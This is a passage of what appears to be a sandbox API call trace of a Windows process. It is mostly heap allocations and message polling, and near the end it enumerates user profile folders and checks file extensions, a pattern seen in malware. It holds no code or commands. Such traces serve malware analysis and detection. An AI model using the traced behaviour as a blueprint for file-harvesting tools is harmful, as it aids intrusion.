0x2d27a40 [0178.480] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.480] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.481] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.481] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.482] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.482] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.483] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.483] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.484] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.484] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.485] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.485] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.486] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.486] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.487] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.487] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.488] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.488] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.489] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.489] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.489] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0178.489] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.490] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.490] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.491] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.491] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.492] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.492] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.493] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.493] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.494] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.494] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.495] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.495] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.496] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.496] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.497] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.497] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0178.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.498] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.498] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0178.499] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.499] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f18 | out: hHeap=0x6a0000) returned 1 [0178.500] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.500] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.500] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.500] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.501] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.501] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.502] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.502] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0178.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.503] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.503] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0178.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0178.504] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0178.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.504] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.505] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.505] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0178.508] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0178.508] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0178.508] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.508] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0178.508] PathFindFileNameW (pszPath="") returned="" [0178.508] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0178.509] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0178.509] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0178.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x810) returned 0x2d154b0 [0178.509] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0178.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0178.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a40 | out: hHeap=0x6a0000) returned 1 [0178.510] FreeLibrary (hLibModule=0x759d0000) returned 1 [0178.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27f68 | out: hHeap=0x6a0000) returned 1 [0178.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0178.510] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0178.510] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.510] FindFirstFileW (in: lpFileName="C:\\Users\\*" (normalized: "c:\\users\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0178.511] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0178.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0178.511] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0178.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.511] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0178.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.512] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x629b4b20, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x629b4b20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0178.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.512] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84cf8 [0178.512] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.513] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0178.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0178.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84cc0 [0178.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0178.513] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.513] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0178.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0178.513] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277e8 | out: hHeap=0x6a0000) returned 1 [0178.514] PathFindExtensionW (pszPath="C:\\Users\\desktop.ini") returned=".ini" [0178.514] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0178.514] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe140cf30, ftLastAccessTime.dwHighDateTime=0x1d8a8ba, ftLastWriteTime.dwLowDateTime=0xe140cf30, ftLastWriteTime.dwHighDateTime=0x1d8a8ba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 1 [0178.514] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84ba8 [0178.514] RtlAllocateHeap 